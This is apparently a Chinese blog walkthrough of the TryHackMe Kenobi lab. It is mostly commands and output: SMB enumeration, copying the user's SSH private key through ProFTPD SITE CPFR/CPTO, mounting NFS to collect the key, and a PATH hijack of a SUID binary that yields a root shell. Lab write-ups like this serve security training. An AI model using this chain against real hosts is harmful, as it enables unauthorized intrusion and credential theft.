THM-OP-kenbi

Mkd1R 2022-6-11 95 6/11

-nmap

使用nmap脚本枚举共享
nmap -p445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.157.56
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 16:58 CST
Nmap scan report for 10.10.157.56
Host is up (0.28s latency).                                                                                                                                                                                                                
                                                                                                                                                                                                                                           
PORT    STATE SERVICE                                                                                                                                                                                                                      
445/tcp open  microsoft-ds                                                                                                                                                                                                                 
                                                                                                                                                                                                                                           
Host script results:                                                                                                                                                                                                                       
| smb-enum-shares:                                                                                                                                                                                                                         
|   account_used: guest                                                                                                                                                                                                                    
|   \\10.10.157.56\IPC$:                                                                                                                                                                                                                   
|     Type: STYPE_IPC_HIDDEN                                                                                                                                                                                                               
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))                                                                                                                                                                                 
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.157.56\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.157.56\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

-smbget

递归下载
smbget -R smb://10.10.157.56/anonymous

cat log.txt
[anonymous]
   path = /home/kenobi/share
   browseable = yes
   read only = yes
   guest ok = yes
存在用户目录

-nc

尝试利用 SITE CPFR 和 SITE CPTO 命令复制 Kenobi 的私钥

# nc 10.10.157.56 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.157.56]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful

var目录是扫描目标主机nfs服务是发现的,所有尝试将目录挂在到我们机器上
mkdir /mnt/kenobiNFS
mount machine_ip:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS

修改id_rsa文件权限为600进行免密登录

-提权

kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6

-strings

strings /usr/bin/menu发现内容使用了curl,创建一个curl文件并设置环境变量进行提权
kenobi@kenobi:~$ cd /tmp
kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu 

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# python -c "import pty;pty.spawn('/bin/bash')"
root@kenobi:/# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
- THE END -

Mkd1R

7月02日21:50

最后修改:2022年7月2日
0

非特殊说明,本博所有文章均为博主原创。